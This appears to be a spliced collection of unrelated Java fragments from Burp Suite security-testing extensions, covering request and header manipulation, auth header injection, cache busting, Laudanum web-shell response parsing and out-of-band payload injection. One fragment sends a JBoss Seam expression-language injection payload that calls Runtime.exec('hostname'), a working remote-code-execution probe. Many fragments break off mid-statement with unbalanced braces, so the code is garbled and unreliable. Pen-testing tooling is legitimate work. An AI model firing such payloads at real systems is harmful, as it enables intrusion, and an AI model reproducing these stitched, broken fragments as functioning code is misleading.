@Override public URL getUrl() { return helpers.analyzeRequest(baseRequestResponse).getUrl(); }
protected List<String> getHeaders() { if (message == null) { return new ArrayList<String>(); } if (isRequest) { IRequestInfo requestInfo = helpers.analyzeRequest(message); return requestInfo.getHeaders(); } else { IResponseInfo responseInfo = helpers.analyzeResponse(message); return responseInfo.getHeaders(); } }
@Override public byte[] buildRequest(byte[] payload) { IParameter newParam = Utilities.helpers.buildParameter(name, Utilities.encodeParam(Utilities.helpers.bytesToString(payload)), type); return Utilities.helpers.updateParameter(request, newParam); }
public byte[] buildBulkRequest(ArrayList<String> params) { String merged = prepBulkParams(params); String replaceKey = "TCZqBcS13SA8QRCpW"; IParameter newParam = Utilities.helpers.buildParameter(replaceKey, "", type); byte[] built = Utilities.helpers.updateParameter(request, newParam); return Utilities.fixContentLength(Utilities.replace(built, Utilities.helpers.stringToBytes(replaceKey+"="), Utilities.helpers.stringToBytes(merged))); }
byte[] buildBasicRequest(ArrayList<String> params) { byte[] built = request; for (String name: params) { String[] param = getValue(name); IParameter newParam = Utilities.helpers.buildParameter(param[0], Utilities.encodeParam(param[1]), type); built = Utilities.helpers.updateParameter(built, newParam); } return built; } }
void scrubCookies(Collection<String> cookieNames) { IExtensionHelpers helpers = BurpExtender.callbacks.getHelpers(); for (String cookieName : cookieNames) { IParameter cookie = helpers.buildParameter(cookieName, "", IParameter.PARAM_COOKIE); request = helpers.removeParameter(request, cookie); } // If Cookie: header is empty, remove IRequestInfo requestInfo = BurpExtender.callbacks.getHelpers().analyzeRequest(request); byte[] body = Arrays.copyOfRange(request, requestInfo.getBodyOffset(), request.length); List<String> headers = requestInfo.getHeaders(); for (int i = 0; i < headers.size(); i++) { if (headers.get(i).equals("Cookie: ")) { headers.remove(i); request = BurpExtender.callbacks.getHelpers().buildHttpMessage(headers, body); } } }
public boolean doAuth(IHttpRequestResponse messageInfo) { if (messageInfo == null) return true; IRequestInfo requestInfo = helpers.analyzeRequest(messageInfo.getRequest()); List<String> reqHeaders = requestInfo.getHeaders(); List<String> newHeaders = new ArrayList<String>(); for (String h : reqHeaders) { if (!h.toUpperCase().startsWith("AUTHORIZATION:")) newHeaders.add(h); } newHeaders.add("Authorization: " + authConfig.getAuthPassword()); byte[] body; byte[] modifiedReq; if (helpers.bytesToString(messageInfo.getRequest()).length() > requestInfo.getBodyOffset()) { body = helpers.stringToBytes(helpers.bytesToString(messageInfo.getRequest()).substring(requestInfo.getBodyOffset())); modifiedReq = helpers.buildHttpMessage(newHeaders, body); } else { modifiedReq = helpers.buildHttpMessage(newHeaders, "".getBytes()); } messageInfo.setRequest(modifiedReq); return true; }
private byte[] addHeader(byte[] request) { IExtensionHelpers helpers = BurpExtender.getHelpers(); IRequestInfo analyzedRequest = helpers.analyzeRequest(request); List<String> headers = analyzedRequest.getHeaders(); // Strip content-length to make sure it's the last param if (headers.get(headers.size()-1).startsWith("Content-Length:")) { headers.remove(headers.size()-1); } byte[] body = Arrays.copyOfRange(request, analyzedRequest.getBodyOffset(), request.length); headers.add(this.replace); return helpers.buildHttpMessage(headers, body); }
IRequestInfo reqInfo = helpers.analyzeRequest(baseRequestResponse); URL curURL = reqInfo.getUrl(); byte[] rawRequest = baseRequestResponse.getRequest(); byte[] rawSimpleRequestSeam = helpers.addParameter(rawRequest, helpers.buildParameter("actionOutcome", "/pwd.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(expressions.getClass().forName('java.lang.Runtime')).exec('hostname')}", IParameter.PARAM_URL) ); IRequestInfo rawSimpleRequestSeamInfo = helpers.analyzeRequest(rawSimpleRequestSeam); List<String> headersSimpleRequestSeam = rawSimpleRequestSeamInfo.getHeaders(); byte messageSimple[] = helpers.buildHttpMessage(headersSimpleRequestSeam, Arrays.copyOfRange(rawSimpleRequestSeam, rawSimpleRequestSeamInfo.getBodyOffset(), rawSimpleRequestSeam.length)); IHttpRequestResponse respSimple = callbacks.makeHttpRequest(baseRequestResponse.getHttpService(), messageSimple); byte[] rawRequestSeam = helpers.addParameter(rawRequest, helpers.buildParameter("actionOutcome", "/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[" + i + "].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('hostname')}}", IParameter.PARAM_URL) ); IRequestInfo rawRequestSeamInfo = helpers.analyzeRequest(rawRequestSeam); byte message[] = helpers.buildHttpMessage(headers, Arrays.copyOfRange(rawRequestSeam, rawRequestSeamInfo.getBodyOffset(), rawRequestSeam.length)); IResponseInfo responseInfo = helpers.analyzeResponse(httpResponse); if (header.substring(header.indexOf(":") + 1).trim().contains(helpers.bytesToString(GREP_STRING))) { issues.add(new CustomScanIssue( baseRequestResponse.getHttpService(), helpers.analyzeRequest(baseRequestResponse).getUrl(), resp,
public void addHeader(String headerToAdd) { List<String> headers; int offset; if (isRequest) { IRequestInfo requestInfo = helpers.analyzeRequest(message); headers = requestInfo.getHeaders(); offset = requestInfo.getBodyOffset(); } else { IResponseInfo responseInfo = helpers.analyzeResponse(message); headers = responseInfo.getHeaders(); offset = responseInfo.getBodyOffset(); } headers.add(headerToAdd); this.message = helpers.buildHttpMessage(headers, Arrays.copyOfRange(message, offset, message.length)); }
currentMessage = helpers.updateParameter(currentMessage, helpers.buildParameter(samlContent.getName(), input, samlContent.getType())); currentMessage = helpers.updateParameter(currentMessage, helpers.buildParameter(samlContent.getName(), input, samlContent.getType())); currentMessage = helpers.toggleRequestMethod(currentMessage); List<IParameter> parameters = helpers.analyzeRequest(currentMessage).getParameters(); for (IParameter param : parameters) { currentMessage = helpers.removeParameter(currentMessage, param); currentMessage = helpers.toggleRequestMethod(currentMessage); for (IParameter param : parameters) { if (samlContent.getValue().equals(param.getValue()) switch (samlContent.getType()) { case IParameter.PARAM_URL: currentMessage = helpers.addParameter(currentMessage, helpers.buildParameter(samlContent.getName(), input, IParameter.PARAM_BODY)); break; case IParameter.PARAM_BODY: currentMessage = helpers.addParameter(currentMessage, helpers.buildParameter(samlContent.getName(), input, IParameter.PARAM_URL)); break; currentMessage = helpers.addParameter(currentMessage,param);
String responseString = helpers.bytesToString(responseBytes); if (!responseString.contains(TOKEN)) { return; IResponseInfo responseInfo = helpers.analyzeResponse(responseBytes); String responseBody = helpers.bytesToString(Arrays.copyOfRange( responseBytes, responseInfo.getBodyOffset(), responseBytes.length)); byte[] newRequest = helpers.addParameter( messageInfo.getRequest(), helpers.buildParameter("token", token, IParameter.PARAM_BODY)); newRequest = helpers.toggleRequestMethod(newRequest); // Changes a request method GET to POST
@Override public boolean isEnabled(byte[] respBytes, boolean isRequest) { if (isRequest) { return false; } else { //The tab will appears if it has at least one CSP header IResponseInfo responseInfo = helpers.analyzeResponse(respBytes); Map<String,String> cspHeaders = BurpPolicyBuilder.getCspHeader(responseInfo); return cspHeaders.size() > 0; } }
public boolean isFullDuplicate(IHttpRequestResponse messageInfo) { PrintWriter stdout = new PrintWriter(callbacks.getStdout(), true); IResponseInfo respInfo = helpers.analyzeResponse(messageInfo.getResponse()); if (dubBloomFilter == null) return false; HashFunction m_hash = Hashing.murmur3_32(); if (helpers.bytesToString(messageInfo.getResponse()).length() > respInfo.getBodyOffset()) { String body = helpers.bytesToString(messageInfo.getResponse()).substring(respInfo.getBodyOffset()); /* full-dub detection */ String dedupHashValue = m_hash.hashBytes(helpers.stringToBytes(body)).toString(); if (dubBloomFilter.mightContain(dedupHashValue)) { return true; } dubBloomFilter.put(dedupHashValue); } return false; }
private void addCacheBusters(IHttpRequestResponse messageInfo) { byte[] placeHolder = Utilities.helpers.stringToBytes("$randomplz"); if (Utilities.countMatches(messageInfo.getRequest(), placeHolder) > 0) { messageInfo.setRequest( Utilities.fixContentLength(Utilities.replace(messageInfo.getRequest(), placeHolder, Utilities.helpers.stringToBytes(Utilities.generateCanary()))) ); } String cacheBusterName = null; if (Utilities.globalSettings.getBoolean("Add dynamic cachebuster")) { cacheBusterName = Utilities.generateCanary(); } else if (Utilities.globalSettings.getBoolean("Add 'fcbz' cachebuster")) { cacheBusterName = "fcbz"; } if (cacheBusterName != null) { IParameter cacheBuster = burp.Utilities.helpers.buildParameter(cacheBusterName, "1", IParameter.PARAM_URL); messageInfo.setRequest(Utilities.helpers.addParameter(messageInfo.getRequest(), cacheBuster)); } }
public LaudanumResponse(IBurpExtenderCallbacks callbacks, byte[] responseBytes) { IResponseInfo responseInfo = callbacks.getHelpers().analyzeResponse(responseBytes); byte[] body = Arrays.copyOfRange(responseBytes, responseInfo.getBodyOffset(), responseBytes.length); String[] outputParts = callbacks.getHelpers().bytesToString(body).split("&"); for (String part : outputParts) { String[] split = part.split("="); if (split.length == 2) { params.put(split[0].trim(), callbacks.getHelpers().urlDecode(split[1])); //callbacks.printOutput("Setting: " + part); //callbacks.printOutput("*** NAME = '" + split[0] + "'"); //callbacks.printOutput("*** VALUE = "+split[1]); //callbacks.printOutput("*** DECODED VALUE = "+callbacks.getHelpers().urlDecode(split[1])); } } if (params.size() < 2) { params.put("stderr", callbacks.getHelpers().urlDecode(callbacks.getHelpers().bytesToString(body))); // if we can't process the response, spit out what we got. } }
) { List<String> headers = buildHeaders(swagger, path, operation); byte[] httpMessage = this.burpExtensionHelpers.buildHttpMessage(headers, null); case "body": httpMessage = this.burpExtensionHelpers .addParameter(httpMessage, this.burpExtensionHelpers .buildParameter(parameter.getName(), type, (byte) 1)); case "query": httpMessage = this.burpExtensionHelpers .addParameter(httpMessage, this.burpExtensionHelpers .buildParameter(parameter.getName(), type, (byte) 0));
public static byte[] setHeader(byte[] request, String header, String value) { int[] offsets = getHeaderOffsets(request, header); ByteArrayOutputStream outputStream = new ByteArrayOutputStream(); try { outputStream.write( Arrays.copyOfRange(request, 0, offsets[1])); outputStream.write(helpers.stringToBytes(value)); outputStream.write(Arrays.copyOfRange(request, offsets[2], request.length)); return outputStream.toByteArray(); } catch (IOException e) { throw new RuntimeException("Request creation unexpectedly failed"); } catch (NullPointerException e) { Utilities.out("header locating fail: "+header); Utilities.out("'"+helpers.bytesToString(request)+"'"); throw new RuntimeException("Can't find the header"); } }
public byte[] injectPayloads(byte[] request, Integer requestCode) { //request = Utilities.replaceRequestLine(request, "GET @"+collabId + "/"+collabId.split("[.]")[0] + " HTTP/1.1"); //request = Utilities.addOrReplaceHeader(request, "Referer", "http://portswigger-labs.net/redirect.php?url=https://portswigger-labs.net/"+collabId); request = Utilities.addOrReplaceHeader(request, "Cache-Control", "no-transform"); for (String[] injection: injectionPoints) { String payload = injection[2].replace("%s", collab.generateCollabId(requestCode, injection[1])); // replace %h with corresponding Host header (same as with %s for Collaborator) payload = payload.replace("%h", Utilities.getHeader(request, "Host")); switch ( injection[0] ){ case "param": IParameter param = Utilities.helpers.buildParameter(injection[1], payload, IParameter.PARAM_URL); request = Utilities.helpers.removeParameter(request, param); request = Utilities.helpers.addParameter(request, param); break; case "header": request = Utilities.addOrReplaceHeader(request, injection[1], payload); break; default: Utilities.out("Unrecognised injection type: " + injection[0]); } } return request; }
private void addParameter(String name, String value, byte type) { IParameter param = callbacks.getHelpers().buildParameter(name, value, type); requestBytes = callbacks.getHelpers().addParameter(requestBytes, param); }